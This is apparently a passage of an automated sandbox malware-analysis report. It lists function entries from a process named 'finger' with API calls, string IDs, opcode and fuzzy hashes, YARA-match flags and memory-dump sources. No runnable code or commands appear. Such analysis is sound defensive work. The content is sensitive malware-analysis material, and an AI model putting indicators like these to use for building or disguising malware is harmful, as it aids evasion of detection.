                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                              • Instruction ID: cc38aef40b383ee565a0d5b30e32773ff939f63b9513c21cfde8e922d9695965
                                                              • Opcode Fuzzy Hash: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                              • Instruction Fuzzy Hash: AA316CB1A01305BBDB14DFA4C880FEAB7B9FF84754F04815CEA59AB244D770AA00CBA4
                                                              Function 0294F6FD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                              • Instruction ID: 51b951891602de733d074cd379a16bd2a984ab265086c45eb180d7f4e4866961
                                                              • Opcode Fuzzy Hash: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                              • Instruction Fuzzy Hash: DD3141B5A0060A9FDB10DFD8C880DEFB7B9FF88304B108559E905E7204DB75EA05CBA0
                                                              Function 0294F700 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                              • Instruction ID: 367b4216bd3d808291af07ba88b5aeee137747fb73577dbf1da337b53426e6dd
                                                              • Opcode Fuzzy Hash: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                              • Instruction Fuzzy Hash: 50310FB5A0060A9FDB00DFD8D880DEFB7B9BF88304B108559E915AB214DB75EE45CBA0
                                                              Function 02944700 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02944772
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction ID: f67ded027f6416a2711b1d7aed9d721ca9e8ab22e9301519acde3b98ec63a78d
                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction Fuzzy Hash: A2011EB5E0020DBBDB10EBE4DC41F9DB3B99B44308F004195AD0897240FA71E715CB91
                                                              Function 02959A00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,029484CE,00000010,?,?,?,00000044,?,00000010,029484CE,?,00000000,?), ref: 02959A60
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                              • Instruction ID: 2a93ea33eb52e33431749566b22c09b7105a86dd66c0f66493e2977a68ebdfe6
                                                              • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                              • Instruction Fuzzy Hash: 540180B2215108BBDB44DE99DC81EDB77AEAF8C754F408208BA1DA3240D630F9518BA4
                                                              Function 02939EC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02939F05
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                              • Instruction ID: 33ef64138757e97978eef6264e4540878f02926359f74480cadb2758f172d1cd
                                                              • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                              • Instruction Fuzzy Hash: 45F0E57374031436E621A5A99C02FDB765DCBC4765F150425FB0DEA1C0D5A6B50147E9
                                                              Function 02939EBC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02939F05
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                              • Instruction ID: b3570ba4203a00fc8ca45efb81085d24902bdf34be74f9b8a9ffee424500d8d5
                                                              • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                              • Instruction Fuzzy Hash: 31F06D7334031037E232A6AA8C02FCB76ADCFC1B50F140019FB0CAA2C0D9A2B80087F8
                                                              Function 02959980 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84D8BFF,00000007,00000000,00000004,00000000,02943F8F,000000F4), ref: 029599B9
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction ID: 91a9d0e34b7b81da26b02aa54402cbed1ac26e2f97d5b8cd1bbf017d5b9993f5
                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction Fuzzy Hash: 74E065B2200214BBDA10EE59DC41EAB37AEEFC9710F004009FE09A7241C670B8118BB8
                                                              Function 02959940 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(02941C06,?,0295587B,02941C06,0295586F,0295587B,?,02941C06,0295586F,00001000,?,?,00000000), ref: 02959979
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction ID: eed3ed912a9bf669601ba6020767faa25292d60e091ee410dcd1194ad220cd55
                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction Fuzzy Hash: D2E065722042047BDA10EE69EC45E9B37AEEFC9710F008009FA1CA7240DA31B8518BB8
                                                              Function 02948510 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0294853C
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                              • Instruction ID: 6c8337d27dc8fdcb021ca4fe6c8922e954a7c3832af80cd739181be680f56d23
                                                              • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                              • Instruction Fuzzy Hash: FAE0867165430427EB34AAA8DD45F66335DAB48B38F1846A0FD1DDB2C1EA78F5014254
                                                              Function 0294850D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0294853C
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                              • Instruction ID: f9bbe1f96c346b1fb233dc3a4515b86c198001f52f4fa8f9fde6d96329853f2e
                                                              • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                              • Instruction Fuzzy Hash: EFE026B690430027E73066649F46BAA321D6B00B38F280AA4F82D9B1C3E63CD1024324
                                                              Function 02948300 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02941EF0,029581AF,0295586F,02941EC0), ref: 02948333
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                              • Instruction ID: a498ead3959273f69440f271d81d43ad47e685e1912ce344e09a5f9e36b88707
                                                              • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                              • Instruction Fuzzy Hash: 27D05E723403053BEA01F6E4DC06F96328D9B40798F050074FA0CD62C1E9A8F1004669
                                                              Function 032C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 653f4e06591d11760d6120308dd458cdc5f74af797fb565bf0e797b023dec1ab
                                                              • Instruction ID: 1b009a86b3a40b5299e906354fa56bcc20b3d156ff5bff9d73d48deed4e6ab88
                                                              • Opcode Fuzzy Hash: 653f4e06591d11760d6120308dd458cdc5f74af797fb565bf0e797b023dec1ab
                                                              • Instruction Fuzzy Hash: ACB09B719115D5C5DE11E7604A08717791467D0701F1AC565D3030641E4739C5D1E175

                                                              Non-executed Functions

                                                              Function 035A04BE Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                              • Instruction ID: c0ab91c4cb4e4084d76767fee38806103c20e96313e73d9d2a458df7f6ef2841
                                                              • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                              • Instruction Fuzzy Hash: EB41B77561CF0D4FD368EF6CE08167AB3F1FB89310F54052DD98AC72A2E670D8468685
                                                              Function 0293E3A1 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                              • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                              • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                              • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                              Function 035AE039 Relevance: 56.5, Strings: 45, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                              • Instruction ID: d8509279a86f6eae2d195912bbfab70964e5d831018242874d0e3db52dc4a465
                                                              • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                              • Instruction Fuzzy Hash: 8A9162F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905DB85
                                                              Function 035A3C01 Relevance: 26.3, Strings: 21, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                              • API String ID: 0-2065742749
                                                              • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                              • Instruction ID: 1718c6b74ce9ce2c176e4c5fb22ea75dd2e8ca8cfd000cd78d35495defbfa372
                                                              • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                              • Instruction Fuzzy Hash: 1241F2B480478CEBCF18CF85E5416DEBB71FF05394F904159E9096F294C7758616CB89
                                                              Function 032C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                              • Instruction ID: 5dd81b47c92b7d01faec2a3bc89d8580878746c7aad80b91430ac9947cdf1fc4
                                                              • Opcode Fuzzy Hash: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                              • Instruction Fuzzy Hash: B551A7B6A30256BFCF10DB98989097EF7B8BB08201B14C76DE569D7641D674DE808BE0
                                                              Function 03332410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 54f2311c93030bd06c575d0321fe28c2301c66b07d8a89aa79c767636902fa17
                                                              • Instruction ID: 4ecf198480d8af67bef4c426e4495925111178fc700716c6a78592ca9b769c42
                                                              • Opcode Fuzzy Hash: 54f2311c93030bd06c575d0321fe28c2301c66b07d8a89aa79c767636902fa17
                                                              • Instruction Fuzzy Hash: 2B5192B5A00645AEDB20DE9CCCD097FF7FDAF45200B48C859E596D7641E7B4EA8087A0
                                                              Function 032B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ExecuteOptions, xrefs: 032F46A0
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032F4725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 032F4787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032F46FC
                                                              • Execute=1, xrefs: 032F4713
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032F4742
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032F4655
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                              • Instruction ID: be2d407606837f1269d94fc6da4c07cde34421379d64f8d72250ceaf9151c395
                                                              • Opcode Fuzzy Hash: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                              • Instruction Fuzzy Hash: 0E510835A203196FDF24EAA9DC95FEEB3BCAF44344F0401A9D505AB191D7B0AAC58F50
                                                              Function 03356940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: 36eace334b1bc1aa5735fa59ee5d77ecb5312e14b78869fd8b294694ef89dc29
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 000224B5508341AFC304CF28C990E6FBBE5EFC8700F449A2DB9898B264DB71E945CB42
                                                              Function 032CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 567e1f4c075c75283a4ad1cfa9192390a832ee389863b7b6fb41c29169243ddb
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 4A81BC35E752CA9ADF24CE68C8927AEBBA5AF45310F2C435DD861A73D0C77488C0CB50
                                                              Function 033320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 67335eb2ce4a03032889623fedaae0da8eaf0dc491996e07a3810698d58eddb2
                                                              • Instruction ID: cbba936237037a00da38da365b49f7d9355fb67d361b96b76e60334e34b5ef67
                                                              • Opcode Fuzzy Hash: 67335eb2ce4a03032889623fedaae0da8eaf0dc491996e07a3810698d58eddb2
                                                              • Instruction Fuzzy Hash: D0215376E10219ABDB10DE69DD84AEFB7F8AF45644F08451AE905E7200E770D9418BE1
                                                              Function 032AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 032F031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032F02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032F02BD
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                              • Instruction ID: 58efd630fb05af1bcc32f007bc3083ea86c563cf8b67fb8e5904b8840e58c522
                                                              • Opcode Fuzzy Hash: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                              • Instruction Fuzzy Hash: 73E1C030624B42AFD725CF28CD84B2AF7E4BB44714F184A6DF5A58B2D1D778D884CB52
                                                              Function 032BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 032F7B8E
                                                              • RTL: Re-Waiting, xrefs: 032F7BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032F7B7F
                                                              Memory Dump Source
